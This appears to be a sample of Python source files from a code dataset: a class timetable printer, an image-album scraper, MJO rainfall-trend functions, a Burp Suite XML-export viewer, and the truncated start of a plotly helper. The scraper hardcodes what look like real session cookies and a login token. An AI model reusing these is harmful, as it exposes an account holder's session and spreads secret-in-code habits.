+{"seq_id":"27095903","text":"#!/usr/bin/python\nimport time\nimport datetime \n\npirm= ['', '', 'English HL', 'English HL', 'IP', 'Lithuanian SL', 'Lithuanian SL', 'CS SL', 'CS SL' ]\nantr= ['CS SL', 'CS SL', 'Mathematics SL', 'Mathematics SL', 'IP', 'Physics SL', 'Physics SL', 'Economics SL', 'Economics SL' ]\ntrec= ['St. Mess', 'English HL', 'English HL', 'Mathematics HL', 'Mathematics HL', 'IP', 'Religion', 'Physics SL', 'Physics SL' ]\nketv= ['Lithuanian SL', 'Lithuanian SL', 'Economics SL', 'Economics SL', 'IP', 'TOK', 'TOK', 'CS HL', 'CS HL' ]\npenkt= ['Mathematics SL', 'Mathematics SL', 'English HL', 'English HL', '', '', '', '', '']\n\ntime = ['8:00-8:45', '8:55-9:40', '9:50-10:35', '10:40-11:25', '11:30-12:15', '12:25-13:10', '13:20-14:05', '14:15-15:00', '15:05-15:50']\ntime_r = [7*60, 8*60+55, 9*60+50, 10*60+40, 11*60+30, 12*60+25, 13*60+20, 14*60+15, 15*60+5] \n\npirm_kab = ['', '', '408', '408', '', '402', '402', 'B205', 'B205']\nantr_kab = ['B205', 'B205', '107', '107', '', 'B203', 'B203', '509', '509']\ntrec_kab = ['', '408', '408', '107', '107', '', '107', 'B203', 'B203']\nketv_kab = ['406', '406', '511', '511', '', '408', '408', 'B205', 'B205']\npenkt_kab = ['107', '107', '408', '408', '', '', '', '', '']\n\nclass Pamoka(object):\n name = \"\"\n classroom = \"\"\n time = \"\"\n number =\"\"\n\n def __init__(self, name, classroom, time, number):\n self.name = name\n self.classroom = classroom\n self.time = time\n self.number = number\n\ndef make_lesson(name, classroom, time, number):\n Lesson = Pamoka(name, classroom, time, number)\n if checktime() < time_r[number] and checktime() > time_r[number - 1]:\n if Lesson.name != '':\n print(Lesson.name + \" \" + Lesson.classroom + \" \" + Lesson.time)\n \ndef make_lesson_table(name, classroom, time, number):\n Lesson = Pamoka(name, classroom, time, number)\n if Lesson.name != '':\n print(Lesson.name + \" \" + Lesson.classroom + \" \" + Lesson.time)\n\n#check time\ndef checktime():\n deftime = datetime.datetime.now()\n hour = deftime.hour\n minutes = deftime.minute\n time = hour*60+minutes\n return time\n\ndef checkday():\n weekday = datetime.datetime.today().weekday()\n return weekday\n \ndef output(day):\n if day == 0:\n for lesson in range(9):\n make_lesson(pirm[lesson], pirm_kab[lesson], time[lesson], lesson)\n elif day == 1:\n for lesson in range(9):\n make_lesson(antr[lesson], antr_kab[lesson], time[lesson], lesson)\n elif day == 2:\n for lesson in range(9):\n make_lesson(trec[lesson], trec_kab[lesson], time[lesson], lesson)\n elif day == 3:\n for lesson in range(9):\n make_lesson(ketv[lesson], ketv_kab[lesson], time[lesson], lesson)\n elif day == 4:\n for lesson in range(9):\n make_lesson(penkt[lesson], penkt_kab[lesson], time[lesson], lesson)\n\n\ndef output_table(day):\n if day == 0:\n for lesson in range(9):\n make_lesson_table(pirm[lesson], pirm_kab[lesson], time[lesson], lesson)\n elif day == 1:\n for lesson in range(9):\n make_lesson_table(antr[lesson], antr_kab[lesson], time[lesson], lesson)\n elif day == 2:\n for lesson in range(9):\n make_lesson_table(trec[lesson], trec_kab[lesson], time[lesson], lesson)\n elif day == 3:\n for lesson in range(9):\n make_lesson_table(ketv[lesson], ketv_kab[lesson], time[lesson], lesson)\n elif day == 4:\n for lesson in range(9):\n make_lesson_table(penkt[lesson], penkt_kab[lesson], time[lesson], lesson)\n\ndef checklate():\n if checktime() > time_r[8]:\n print(\"HW\")\n elif checktime() >= 0 and checktime() < time_r[0]:\n print(\"HW\")\n\nchecklate()\noutput(checkday()) \nprint(\"---\")\noutput_table(checkday())","sub_path":"menu_bar.py","file_name":"menu_bar.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"84970294","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/6/10 17:26\n# @Author : gao\n# @File : 01.py\nimport json\nfrom collections import defaultdict\n\nfrom requests_html import HTMLSession\n\nrequest = HTMLSession()\ncookies = {\n 'PHPSESSID': 'nhs3qvsg0nq1nvnk034ebric80',\n 'Hm_lvt_8bb45b8b013c8d4f9a20752d5e7465e4': '1560127792',\n\n \"_ga\": \"GA1.2.387138892.1560127792\",\n \"_gid\": \"GA1.2.1175112514.1560127792\",\n \"Hm_lpvt_8bb45b8b013c8d4f9a20752d5e7465e4\": \"1560131433\",\n \"_gat_gtag_UA_114322073_1\": \"1\",\n \"KEEP_LOGIN\": \"CxngK%3A05d1a0867a8af870907e0782e548802ca5917e10f29e613518adca5cb91fc9c19b77bee6b36667c5ba71add86faf636ec57bbca67ebbadcb5a13a71d40e20aac9c69c0be68fb56d80a438a07ffbe4dd99e6b1ba7ac4ff2f5646%3A1560102641\",\n\n}\n\n\ndef parse_album(album, info=None):\n if info is None:\n info = defaultdict(dict)\n res = request.get(url=album, cookies=cookies)\n # print(res.text)\n\n imgs = res.html.find('.list-item img')\n descs = res.html.find('.list-item-desc a')\n\n # for x in imgs:\n # print(x.attrs.get('alt'), ' -> ', x.attrs.get('src'))\n # for x in desc:\n # print(x.attrs.get('href'), x.text)\n\n for img in imgs:\n key = img.attrs.get('alt').split('.')[0]\n url = img.attrs.get('src').replace('.md', '')\n\n info[key].update(url=url)\n\n for desc_ in descs:\n key = desc_.attrs.get('href').split('/')[-1]\n desc = desc_.text if len(desc_.text.split('.')) > 1 else desc_.text + '.png'\n\n info[key].update(desc=desc)\n\n if res.html.find('.pagination-next'):\n next_url = res.html.find('.pagination-next')[0].find('a')[0].attrs.get('href')\n if next_url:\n parse_album(next_url, info=info)\n\n return info\n\n\ninfo = parse_album('https://imgchr.com/album/C2pZQ')\njson.dump(info, open('路过图床.json', 'w'))","sub_path":"路过/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"281650651","text":"import xarray as xr\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport dask.array\nimport cartopy.crs as ccrs\nimport matplotlib.colors as colors\nimport datetime as dt\nfrom matplotlib.colors import BoundaryNorm\nimport sys\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport matplotlib.gridspec as gridspec\n\n\n\n################################### General Functions\n################################### General Functions\n################################### General Functions\n################################### General Functions\n################################### General Functions\n################################### General Functions\n################################### General Functions\n\n\n# This function moves the start of the wet season [10, 11, 12] to the next year. This means that\n# this year is just the data for one wet season\n\ndef wet_season_year(data):\n \n # This is the start of the wet_season, wet want to move it to the next year so that the start of the\n # wet season and the end are both in the one year. This makes it easier for calculatins later on \n \n data_start = data.where(data.time.dt.month.isin([12]), drop = True) # The later months of the year\n data_start['time'] = data_start.time + pd.to_timedelta('365day') # moving them forward a year\n \n data_end = data.where(data.time.dt.month.isin([1,2,3]), drop = True) # The end half\n \n total = data_end.combine_first(data_start) # All in one year now :)\n \n return total\n\n\ndef split_into_1to8(datafile, rmm_xr):\n \n \n \n '''~~~~~~~~~~~~~~~~~~ Inactive Phases'''\n rmm_inact_dates = rmm_xr.where(rmm_xr.amplitude < 1, drop = True).time.values\n datafile_inact = datafile.where(datafile.time.isin(rmm_inact_dates), drop = True)\n\n '''~~~~~~~~~~~~~~~~~~ Active Phases\n Summary: Looping through all the different RMM phases; getting the dates fro this phase; finding just the rainfall\n in this phase'''\n single_phase = [] # Storage for later concatinating in xarray\n rmm_act = rmm_xr.where(rmm_xr.amplitude >= 1, drop = True) # Only acitve when RMM > 1\n phases = np.arange(1,9) # 8 phases we are looping through\n for phase in phases:\n rmm_single_dates = rmm_act.where(rmm_act.phase == phase, drop = True).time.values # The dates of this phase\n datafile_single = datafile.where(datafile.time.isin(rmm_single_dates), drop = True) # The datafile data in this phase\n single_phase.append(datafile_single) # Appending\n\n phases = np.append(phases.astype('str'), 'inactive') # The ianctive also needs to be included\n single_phase.append(datafile_inact) \n\n\n # Final File\n datafile_RMM_split = xr.concat(single_phase, pd.Index(phases, name = 'phase'))\n \n \n \n return datafile_RMM_split\n\n\n\ndef resample_phase_to_subphase(data):\n \n enhanced = data.sel(phase = ['4','5','6']).sum(dim = 'phase')\n suppressed = data.sel(phase = ['1','2','8']).sum(dim = 'phase')\n trans = data.sel(phase = ['3','7']).sum(dim = 'phase')\n inact = data.sel(phase = 'inactive').drop('phase')\n \n return xr.concat([enhanced,suppressed, trans, inact], \n pd.Index(['enhanced','suppressed','transition','inactive'], name = 'phase'))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n############################ MJO Trends\n############################ MJO Trends\n############################ MJO Trends\n############################ MJO Trends\n\n\n\n'''Counts the number of days in each of the MJO phases for each wet-season. This is useful for \nnormalising all of the count trends'''\ndef count_in_rmm_phase(rmm):\n\n rmm_act = rmm.where(rmm.amplitude > 1, drop = True)\n \n phases = np.arange(1,9)\n single_phase = []\n for phase in phases:\n\n # Just the data for this single rmm phase\n rmm_single_phase = rmm_act.where(rmm_act.phase == phase)\n # Resmapling via year, to get the number of days in each phase\n number_per_year = rmm_single_phase.phase.resample(time = 'y').count(dim = 'time')\n # Appending\n single_phase.append(number_per_year.values)\n\n\n\n '''Inactive Phase'''\n rmm_inact = rmm.where(rmm.amplitude <=1 , drop = True)\n number_per_year_inact = rmm_inact.phase.resample(time = 'y').count(dim = 'time')\n\n single_phase.append(number_per_year_inact.values)\n\n titles = np.append(np.array([str(phase) for phase in phases]),['inactive'])\n \n datafile_RMM_split = xr.Dataset({'number':(('phase','year'), single_phase)},\n {'phase':titles,\n 'year': number_per_year.time.dt.year.values\n })\n \n \n \n return datafile_RMM_split\n\n\ndef count_in_rmm_subphase(rmm):\n \n enhanced = [4,5,6]\n suppressed = [1,2,8]\n transition = [3,7]\n\n phase_dict = {'enhanced': enhanced, 'suppressed': suppressed, 'transition': transition}\n single_phase = []\n \n rmm_act = rmm.where(rmm.amplitude > 1, drop = True)\n\n for phase_name, phase_nums in phase_dict.items():\n\n # Just the data for this single rmm phase\n rmm_single_phase = rmm_act.where(rmm_act.phase.isin(phase_nums))#, drop = True)\n # Resmapling via year, to get the number of days in each phase\n number_per_year = rmm_single_phase.phase.resample(time = 'y').count(dim = 'time')\n # Appending\n single_phase.append(number_per_year.values)\n\n\n\n '''Inactive Phase'''\n rmm_inact = rmm.where(rmm.amplitude <=1)# , drop = True)\n number_per_year_inact = rmm_inact.phase.resample(time = 'y').count(dim = 'time')\n\n single_phase.append(number_per_year_inact.values)\n\n titles = np.append(np.array([key for key in phase_dict.keys()]),['inactive'])\n\n datafile_RMM_split = xr.Dataset({'number':(('phase','year'), single_phase)},\n {'phase':titles,\n 'year': number_per_year.time.dt.year.values\n })\n \n \n# datafile_RMM_split = xr.concat(single_phase, pd.Index(titles, name = 'phase'))\n \n return datafile_RMM_split\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n############################ Rainfall Trends\n############################ Rainfall Trends\n############################ Rainfall Trends\n############################ Rainfall Trends\n############################ Rainfall Trends\n############################ Rainfall Trends\n############################ Rainfall Trends\n\nimport mystats\n\n# Calculates the trend for each individaul grid cell\ndef grid_trend(x,t):\n # If every point is just a nan values. We don't want to do the polyfit calculation. Just return nan\n if np.all(np.isnan(x)):\n return float('nan')\n \n # Getting the gradient of a linear interpolation\n idx = np.isfinite(x) & np.isfinite(t) #checking where the nans are for both\n grad = np.polyfit(t[idx],x[idx],1)[0]\n return grad\n\ndef calculate_trend(percentile):\n \n # The axis number that year is\n axis_num = percentile.get_axis_num('year')\n \n '''Applying trends along each grid cell'''\n percentile_trend_meta = np.apply_along_axis(grid_trend,axis_num, percentile.values, \n t = percentile.year.values)\n\n '''Turning into an xarray dataset'''\n # Added in logic so that now data with or without phase vlaues \n # can be passed in. This works by creating dict with lat and lon.\n \n # List of the coordinates from the array itself\n coord_list = ['lat','lon']\n \n # The values to be used for each coordinates.\n coord_dict = {'lat':percentile.lat,'lon':percentile.lon}\n \n # If phase is also in the coord_list then we have to add this to the coord dict.\n # The reorder so that pahse is the first element in the dict.\n# print(list(percentile))/\n if 'phase' in list(percentile.coords):\n coord_dict['phase'] = percentile.phase.values\n coord_dict = {k:coord_dict[k] for k in ['phase','lat','lon']}\n # Adding phase too first element of coord list. \n coord_list = ['phase'] + coord_list\n \n# print('\\n')\n# print(coord_list)#, percentile_trend_meta.values.shape, coord_dict, sep = '\\n')\n \n trend = xr.Dataset({'trend':(coord_list, percentile_trend_meta)},\n coord_dict)\n return trend\n\ndef convert_to_percent_per_decade(percentile, trend):\n \n mean_gridcell = percentile.mean(dim = 'year')\n \n return (trend * 10 / mean_gridcell) * 100\n\ndef calculate_pvals(percentile, trend):\n year_num = percentile.get_axis_num('year')\n \n trend_pval_meta = np.apply_along_axis(mystats.mann_kendall, year_num, percentile)\n\n '''Turning into an xarray dataset'''\n # Added in logic so that now data with or without phase vlaues \n # can be passed in. This works by creating dict with lat and lon.\n \n # List of the coordinates from the array itself\n coord_list = ['lat','lon']\n \n # The values to be used for each coordinates.\n coord_dict = {'lat':percentile.lat,'lon':percentile.lon}\n \n # If phase is also in the coord_list then we have to add this to the coord dict.\n # The reorder so that pahse is the first element in the dict.\n if 'phase' in list(percentile.coords):\n coord_dict['phase'] = percentile.phase.values\n coord_dict = {k:coord_dict[k] for k in ['phase','lat','lon']}\n # Adding phase too first element of coord list. \n coord_list = ['phase'] + coord_list\n\n pvals = xr.Dataset({'pvals':(coord_list, trend_pval_meta)},\n coord_dict) \n \n return pvals\n\ndef significant_trend_calc(data, pvals):\n sig = data.where(np.logical_and(pvals.pvals >= 0 ,pvals.pvals <= 0.1))\n\n return sig\n\ndef return_alltrendinfo_custom(data, normalise = 0):\n import load_dataset as load\n\n if normalise == 'phase':\n rmm = load.load_rmm()\n rmm = wet_season_year(rmm)\n\n phase_count = count_in_rmm_phase(rmm)\n data = (data/phase_count.number)\n \n elif normalise == 'subphase':\n rmm = load.load_rmm()\n rmm = wet_season_year(rmm)\n subphase_count = count_in_rmm_subphase(rmm)\n\n data = (data/subphase_count.number)\n\n print('calculating trend', end = '')\n # Calculates the trend\n trend = calculate_trend(data)\n print(': complete')\n \n\n # Convertes to percent per decade\n print('converting to percent per decade', end = '')\n trend_percent = convert_to_percent_per_decade(data, trend)\n print(': complete')\n\n # Calculates the significant values\n print('finding significant points', end = '')\n pvals = calculate_pvals(data, trend)\n print(': complete')\n\n print('getting just significant trend points', end = '')\n trend_sig = significant_trend_calc(trend, pvals)\n trend_percent_sig = significant_trend_calc(trend_percent, pvals)\n print(': complete')\n\n return trend, trend_sig, trend_percent, trend_percent_sig","sub_path":"phase_calc_functions.py","file_name":"phase_calc_functions.py","file_ext":"py","file_size_in_byte":10927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"498097480","text":"from burp import IBurpExtender\nfrom burp import ITab\nfrom burp import IMessageEditorController\nfrom burp import IHttpRequestResponse\nfrom burp import IParameter\nfrom burp import IHttpService\n\nfrom java.awt import BorderLayout\nfrom java.util import ArrayList\nfrom java.util import Base64\n\nfrom javax.swing import JScrollPane\nfrom javax.swing import JSplitPane\nfrom javax.swing import JTabbedPane\nfrom javax.swing import JTable\nfrom javax.swing import JButton\nfrom javax.swing import JPanel\nfrom javax.swing import JFileChooser\n\nfrom javax.swing.table import AbstractTableModel\nfrom javax.xml.parsers import DocumentBuilderFactory\nfrom javax.xml.parsers import DocumentBuilder\n\nfrom threading import Lock\nfrom org.w3c.dom import Node\n\nclass BurpExtender(IBurpExtender, ITab, IMessageEditorController, AbstractTableModel):\n\t\n\t\"\"\"\n\t\tImplements IBurpExtender\n\t\"\"\"\n\n\tdef\tregisterExtenderCallbacks(self, callbacks):\n\t\t\n\t\t# Save callbacks and helpers for later use\n\t\tself._callbacks = callbacks\n\t\tself._helpers = callbacks.getHelpers()\n\t\t\n\t\t# Set extension name\n\t\tself._callbacks.setExtensionName(\"Burp XML Export Viewer\")\n\t\t\n\t\t# Create the log and a lock on which to synchronize when adding log entries\n\t\tself._log = ArrayList()\n\t\tself._lock = Lock()\n\t\t\n\t\t# Main panel\n\t\tself._mainPanel = JPanel(BorderLayout())\n\t\t\n\t\t# Button to load Burp XML Export file\n\t\tself._loadButton = JButton('Select Burp XML Export File')\n\t\tself._loadButton.addActionListener(self.loadButtonTapped)\n\t\tself._mainPanel.add(self._loadButton, BorderLayout.PAGE_START)\n\t\t\n\t\t# File chooser for Burp XML Export file\n\t\tself._fc = JFileChooser()\n\t\tself._fc.setDialogTitle(\"Select Burp XML Export File\")\n\t\t\n\t\t# Splitpane for table and request/response view\n\t\tself._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)\n\t\tself._mainPanel.add(self._splitpane, BorderLayout.CENTER)\n\t\t\n\t\t# Table of log entries\n\t\tself._logTable = Table(self)\n\t\tself._scrollPane = JScrollPane(self._logTable)\n\t\tself._splitpane.setTopComponent(self._scrollPane)\n\n\t\t# Set column width of table\n\t\tself._logTable.setAutoResizeMode(JTable.AUTO_RESIZE_OFF)\n\t\tself._logTable.getColumnModel().getColumn(0).setPreferredWidth(40)\n\t\tself._logTable.getColumnModel().getColumn(1).setPreferredWidth(60)\n\t\tself._logTable.getColumnModel().getColumn(2).setPreferredWidth(70)\n\t\tself._logTable.getColumnModel().getColumn(3).setPreferredWidth(300)\n\t\tself._logTable.getColumnModel().getColumn(4).setPreferredWidth(500)\n\t\tself._logTable.getColumnModel().getColumn(5).setPreferredWidth(300)\n\t\tself._logTable.getColumnModel().getColumn(6).setPreferredWidth(100)\n\t\tself._logTable.getColumnModel().getColumn(7).setPreferredWidth(100)\n\t\tself._logTable.getColumnModel().getColumn(8).setPreferredWidth(100)\n\t\tself._logTable.getColumnModel().getColumn(9).setPreferredWidth(100)\n\t\tself._logTable.getColumnModel().getColumn(10).setPreferredWidth(230)\n\t\tself._logTable.getColumnModel().getColumn(11).setMaxWidth(100000)\n\n\t\t# Tabs with request and response viewers\n\t\tself._tabs = JTabbedPane()\n\t\tself._requestViewer = callbacks.createMessageEditor(self, False)\n\t\tself._responseViewer = callbacks.createMessageEditor(self, False)\n\t\tself._tabs.addTab(\"Request\", self._requestViewer.getComponent())\n\t\tself._tabs.addTab(\"Response\", self._responseViewer.getComponent())\n\t\tself._splitpane.setBottomComponent(self._tabs)\n\t\t\n\t\t# Customize UI components\n\t\tself._callbacks.customizeUiComponent(self._mainPanel)\n\t\tself._callbacks.customizeUiComponent(self._splitpane)\n\t\tself._callbacks.customizeUiComponent(self._logTable)\n\t\tself._callbacks.customizeUiComponent(self._scrollPane)\n\t\tself._callbacks.customizeUiComponent(self._tabs)\n\t\t\n\t\t# Add the custom tab to Burp's UI\n\t\tself._callbacks.addSuiteTab(self)\n\t\t\n\t\treturn\n\t\n\t\"\"\"\n\t\tHelper Functions\n\t\"\"\"\n\t\n\tdef loadButtonTapped(self, actionEvent):\n\t\t\n\t\t# Display the file chooser dialog\n\t\tretVal = self._fc.showOpenDialog(None)\n\t\t\n\t\tif retVal == JFileChooser.APPROVE_OPTION:\n\t\t\tself._file = self._fc.getSelectedFile()\n\t\t\tself.resetList() # clear the table from all previous entries\n\t\t\tself.parseXML(self._file) # parse the file and load all entries to the table\n\t\telse:\n\t\t\tprint(\"Open command cancelled by user.\")\n\t\n\tdef parseXML(self, file):\n\t\t\n\t\t# Initialize XML stuff\n\t\tdbFactory = DocumentBuilderFactory.newInstance()\n\t\tdBuilder = dbFactory.newDocumentBuilder()\n\t\tdoc = dBuilder.parse(file)\n\t\tdoc.getDocumentElement().normalize()\n\t\t\n\t\t# All entries in Burp's XML Export File have tag - ...
\n\t\tnodeList = doc.getElementsByTagName(\"item\")\n\n\t\t# for i in reversed(range(0, nodeList.getLength())):\n\t\tfor i in range(0, nodeList.getLength()):\n\t\t\tnode = nodeList.item(i)\n\t\t\t\n\t\t\tif node.getNodeType() == Node.ELEMENT_NODE:\n\t\t\t\t\n\t\t\t\trequest = node.getElementsByTagName(\"request\").item(0).getTextContent()\n\t\t\t\tresponse = node.getElementsByTagName(\"response\").item(0).getTextContent()\n\n\t\t\t\trequest_isBase64 = node.getElementsByTagName(\"request\").item(0).getAttribute(\"base64\")\n\t\t\t\tresponse_isBase64 = node.getElementsByTagName(\"response\").item(0).getAttribute(\"base64\")\n\n\t\t\t\tif request_isBase64 == \"true\":\n\t\t\t\t\trequest = Base64.getDecoder().decode(request)\n\n\t\t\t\tif response_isBase64 == \"true\":\n\t\t\t\t\tresponse = Base64.getDecoder().decode(response)\n\n\t\t\t\tinfo = {\n\t\t\t\t\t\"time\" : node.getElementsByTagName(\"time\").item(0).getTextContent(),\n\t\t\t\t\t\"url\" : node.getElementsByTagName(\"url\").item(0).getTextContent(),\n\t\t\t\t\t\"host\" : node.getElementsByTagName(\"host\").item(0).getTextContent(),\n\t\t\t\t\t\"port\" : node.getElementsByTagName(\"port\").item(0).getTextContent(),\n\t\t\t\t\t\"protocol\" : node.getElementsByTagName(\"protocol\").item(0).getTextContent(),\n\t\t\t\t\t\"method\" : node.getElementsByTagName(\"method\").item(0).getTextContent(),\n\t\t\t\t\t\"path\" : node.getElementsByTagName(\"path\").item(0).getTextContent(),\n\t\t\t\t\t\"extension\" : node.getElementsByTagName(\"extension\").item(0).getTextContent(),\n\t\t\t\t\t\"request\" : request,\n\t\t\t\t\t\"status\" : node.getElementsByTagName(\"status\").item(0).getTextContent(),\n\t\t\t\t\t\"responselength\" : node.getElementsByTagName(\"responselength\").item(0).getTextContent(),\n\t\t\t\t\t\"mimetype\" : node.getElementsByTagName(\"mimetype\").item(0).getTextContent(),\n\t\t\t\t\t\"response\" : response,\n\t\t\t\t\t\"comment\" : node.getElementsByTagName(\"comment\").item(0).getTextContent(),\n\t\t\t\t\t\"highlight\" : \"\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tlogEntry = LogEntry(info)\n\n\t\t\t\t# Remove GET parameters from path component\n\t\t\t\t# Path component usually looks like this: /some/path/index.html?q=foo&z=faa\n\t\t\t\tinfo[\"path\"] = info[\"path\"].split(\"?\")[0]\n\n\t\t\t\t# Extract GET parameters\n\t\t\t\tparams = []\n\t\t\t\tfor param in self._helpers.analyzeRequest(logEntry).getParameters():\n\t\t\t\t\tif param.getType() == IParameter.PARAM_URL:\n\t\t\t\t\t\tparams.append(\"{}={}\".format(param.getName(), param.getValue()))\n\t\t\t\tinfo[\"params\"] = \"&\".join(params)\n\n\t\t\t\tself.addLogEntryToList(logEntry)\n\n\tdef addLogEntryToList(self, logEntry):\n\t\tself._lock.acquire()\n\t\trow = self._log.size()\n\t\tself._log.add(logEntry)\n\t\tself.fireTableRowsInserted(row, row)\n\t\tself._lock.release()\n\n\tdef resetList(self):\n\t\tself._lock.acquire()\n\t\tself._log.clear()\n\t\tself.fireTableRowsInserted(0,0)\n\t\tself._lock.release()\n\n\t\"\"\"\n\t\tImplements ITab\n\t\"\"\"\n\n\tdef getTabCaption(self):\n\t\treturn \"Burp XML Export Viewer\"\n\t\n\tdef getUiComponent(self):\n\t\treturn self._mainPanel\n\n\t\"\"\"\n\t\tExtends AbstractTableModel\n\t\"\"\"\n\n\tdef getRowCount(self):\n\t\ttry:\n\t\t\treturn self._log.size()\n\t\texcept:\n\t\t\treturn 0\n\n\tdef getColumnCount(self):\n\t\treturn 12\n\n\tdef getColumnName(self, columnIndex):\n\t\tif columnIndex == 0:\n\t\t\treturn \"#\"\n\t\tif columnIndex == 1:\n\t\t\treturn \"Method\"\n\t\tif columnIndex == 2:\n\t\t\treturn \"Protocol\"\n\t\tif columnIndex == 3:\n\t\t\treturn \"Host\"\n\t\tif columnIndex == 4:\n\t\t\treturn \"Path\"\n\t\tif columnIndex == 5:\n\t\t\treturn \"Parameters\"\n\t\tif columnIndex == 6:\n\t\t\treturn \"Status\"\n\t\tif columnIndex == 7:\n\t\t\treturn \"Length\"\n\t\tif columnIndex == 8:\n\t\t\treturn \"MIME type\"\n\t\tif columnIndex == 9:\n\t\t\treturn \"Extension\"\n\t\tif columnIndex == 10:\n\t\t\treturn \"Time\"\n\t\tif columnIndex == 11:\n\t\t\treturn \"Comment\"\n\t\t\n\t\treturn \"\"\n\n\tdef getValueAt(self, rowIndex, columnIndex):\n\t\tlogEntry = self._log.get(rowIndex)\n\t\t\n\t\tif columnIndex == 0:\n\t\t\treturn \"{}\".format(rowIndex)\n\t\tif columnIndex == 1:\n\t\t\treturn logEntry._info[\"method\"]\n\t\tif columnIndex == 2:\n\t\t\treturn logEntry._info[\"protocol\"]\n\t\tif columnIndex == 3:\n\t\t\treturn logEntry.getHttpService().getHost()\n\t\tif columnIndex == 4:\n\t\t\treturn logEntry._info[\"path\"]\n\t\tif columnIndex == 5:\n\t\t\treturn logEntry._info[\"params\"]\n\t\tif columnIndex == 6:\n\t\t\treturn logEntry._info[\"status\"]\n\t\tif columnIndex == 7:\n\t\t\treturn logEntry._info[\"responselength\"]\n\t\tif columnIndex == 8:\n\t\t\treturn logEntry._info[\"mimetype\"]\n\t\tif columnIndex == 9:\n\t\t\treturn logEntry._info[\"extension\"]\n\t\tif columnIndex == 10:\n\t\t\treturn logEntry._info[\"time\"]\n\t\tif columnIndex == 11:\n\t\t\treturn logEntry._info[\"comment\"]\n\t\t\n\t\treturn \"\"\n\n\t\"\"\"\n\t\tImplements IMessageEditorController\n\t\tAllows request and response viewers to obtain details about the messages being displayed\n\t\"\"\"\n\t\n\tdef getHttpService(self):\n\t\treturn self._currentlyDisplayedItem.getHttpService()\n\n\tdef getRequest(self):\n\t\treturn self._currentlyDisplayedItem.getRequest()\n\n\tdef getResponse(self):\n\t\treturn self._currentlyDisplayedItem.getResponse()\n\n\"\"\"\n\tExtends JTable\n\tHandles cell selection\n\"\"\"\n\t\nclass Table(JTable):\n\tdef __init__(self, extender):\n\t\tself._extender = extender\n\t\tself.setModel(extender)\n\t\n\tdef changeSelection(self, row, col, toggle, extend):\n\t\tlogEntry = self._extender._log.get(row)\n\t\tself._extender._requestViewer.setMessage(logEntry.getRequest(), True)\n\t\tself._extender._responseViewer.setMessage(logEntry.getResponse(), False)\n\t\tself._extender._currentlyDisplayedItem = logEntry\n\t\t\n\t\tJTable.changeSelection(self, row, col, toggle, extend)\n\n\"\"\"\n\tCustom class that represents individual log entry\n\tHolds details of each log entry that is displayed in table and request/response viewer\n\"\"\"\n\nclass LogEntry(IHttpRequestResponse):\n\tdef __init__(self, info):\n\t\tself._info = info\n\t\tself._httpService = HttpService(info[\"host\"], info[\"port\"], info[\"protocol\"])\n\t\tself._request = info[\"request\"]\n\t\tself._response = info[\"response\"]\n\t\tself._comment = info[\"comment\"]\n\t\tself._highlight = info[\"highlight\"]\n\n\tdef getRequest(self):\n\t\treturn self._request\n\n\tdef setRequest(self, request):\n\t\tself._request = request\n\n\tdef getResponse(self):\n\t\treturn self._response\n\n\tdef setResponse(self, response):\n\t\tself._response = response\n\n\tdef getComment(self):\n\t\treturn self._comment\n\n\tdef setComment(self, comment):\n\t\tself._comment = comment\n\n\tdef getHighlight(self):\n\t\treturn self._highlight\n\n\tdef setHighlight(self, highlight):\n\t\tself._highlight = highlight\n\n\tdef getHttpService(self):\n\t\treturn self._httpService\n\n\tdef setHttpService(self, httpService):\n\t\tself._httpService = httpService\n\nclass HttpService(IHttpService):\n\tdef __init__(self, host, port, protocol):\n\t\tself._host = host\n\t\tself._port = int(port)\n\t\tself._protocol = protocol\n\n\tdef getHost(self):\n\t\treturn str(self._host)\n\n\tdef getPort(self):\n\t\treturn int(self._port)\n\n\tdef getProtocol(self):\n\t\treturn str(self._protocol)\n","sub_path":"BurpXMLExportViewer.py","file_name":"BurpXMLExportViewer.py","file_ext":"py","file_size_in_byte":10951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"403992022","text":"#!/usr/bin/env python\r\n\r\n\"\"\"My plot settings and methods.\r\n\r\nAuthor: Raul A. Flores\r\n\"\"\"\r\n\r\n#| - Import Modules\r\nimport plotly\r\n\r\n#__|\r\n\r\n# \"font\": {\r\n# \"family\": \"Courier New, monospace\",\r\n# \"size\": plot_title_size,\r\n# \"color\": \"black\",\r\n# },\r\n\r\n#| - Plotly\r\ndef reapply_colors(data):\r\n \"\"\"Redefines the line colors of a plotly data series.\r\n\r\n Groups by legend grouping, fix this it's not general enough\r\n\r\n Args:\r\n plotly data series (list of graph objects to be plotted)\r\n \"\"\"\r\n #| - reapply_colors\r\n from colors.colors import generate_color_palette\r\n\r\n dat_lst_master = data\r\n\r\n groups_list = []\r\n for series_i in dat_lst_master:\r\n groups_list.append(series_i.legendgroup)\r\n\r\n groups_list = list(set(groups_list))\r\n # print(groups_list)\r\n\r\n num_series = len(groups_list)\r\n colors = generate_color_palette(bins=num_series)\r\n\r\n new_list = []\r\n for color in colors:\r\n color_new = tuple([int(255 * x) for x in color])\r\n color_new = \"rgb\" + str(color_new)\r\n new_list.append(color_new.replace(\" \", \"\"))\r\n colors = new_list\r\n\r\n colors_dict = dict(zip(groups_list, colors))\r\n\r\n for series_i in dat_lst_master:\r\n tmp = colors_dict[series_i.legendgroup]\r\n\r\n series_i.marker[\"color\"] = tmp\r\n series_i.line[\"color\"] = tmp\r\n\r\n return(dat_lst_master)\r\n #__|\r\n\r\ndef plot_layout(\r\n # xax_labels =\r\n ):\r\n \"\"\"\r\n \"\"\"\r\n #| - plot_layout\r\n\r\n #| - Plot Settings\r\n plot_title_size = 18\r\n tick_lab_size = 16\r\n axes_lab_size = 18\r\n legend_size = 